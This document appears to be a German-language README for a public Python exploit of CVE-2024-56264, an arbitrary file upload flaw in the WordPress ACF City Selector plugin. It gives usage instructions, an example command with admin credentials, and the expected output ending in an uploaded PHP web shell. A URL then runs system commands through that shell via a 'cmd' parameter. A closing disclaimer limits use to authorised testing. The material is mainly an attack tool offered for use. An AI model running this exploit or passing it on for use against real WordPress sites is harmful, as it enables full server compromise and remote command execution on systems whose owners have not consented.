
Python-Exploit für CVE-2024-56264, eine Schwachstelle durch willkürlichen Dateiupload im WordPress ACF City Selector Plugin <=1.14.0, die eine Remotecodeausführung durch Web-Shell-Upload ermöglicht.
Dieses Repository enthält einen Exploit für CVE-2024-56264, eine Arbitrary File Upload-Schwachstelle im WordPress-Plugin ACF City Selector (Versionen <= 1.14.0). Diese Schwachstelle ermöglicht es einem Angreifer, eine schädliche PHP-Datei (Web-Shell) auf eine verwundbare WordPress-Instanz hochzuladen und beliebige Befehle auf dem Server auszuführen.
<= 1.14.0Das ACF City Selector Plugin validiert hochgeladene Dateien nicht ordnungsgemäß, sodass Angreifer Einschränkungen umgehen und beliebige PHP-Dateien hochladen können. Sobald eine schädliche PHP-Datei hochgeladen wurde, kann ein Angreifer entfernte Systembefehle ausführen, was zu einer vollständigen Serverkompromittierung führt.
Stellen Sie sicher, dass Folgendes installiert ist, bevor Sie das Skript ausführen:
requests Modul (Installation mit: pip install requests)Sie können alle erforderlichen Abhängigkeiten installieren mit:
pip install -r requirements.txt
Ausführen des Exploits:
usage: CVE-2024-56264.py [-h] --url URL --username USERNAME --password PASSWORD
WordPress ACF City Selector plugin <= 1.14.0 - Arbitrary File Upload vulnerability
options:
-h, --help show this help message and exit
--url URL Website base URL (e.g., http://192.168.100.74/wordpress)
--username USERNAME WordPress username
--password PASSWORD WordPress password
python CVE-2024-56264.py --url http://192.168.100.74:888/wordpress --username admin --password admin
Bei erfolgreicher Ausnutzung sollten Sie Folgendes sehen:
[+] Detected plugin version: 1.14.0
[+] Vulnerable version detected! Proceeding with exploitation.
[+] Logged in successfully.
[+] Extracted nonce: abc1234
[+] Shell uploaded successfully: http://wordpress/wp-content/uploads/acfcs/q.php
Bei Erfolg können Sie auf die hochgeladene Shell zugreifen unter:
http://wordpress/wp-content/uploads/acfcs/q.php?cmd=whoami
Dies ermöglicht die Remotebefehlsausführung auf dem Server.
Dieses Skript ist ausschließlich für Bildungs- und autorisierte Sicherheitstestzwecke gedacht. Unbefugte Nutzung ist illegal und kann zu schwerwiegenden Konsequenzen führen. Der Autor übernimmt keine Verantwortung für einen Missbrauch dieses Exploits.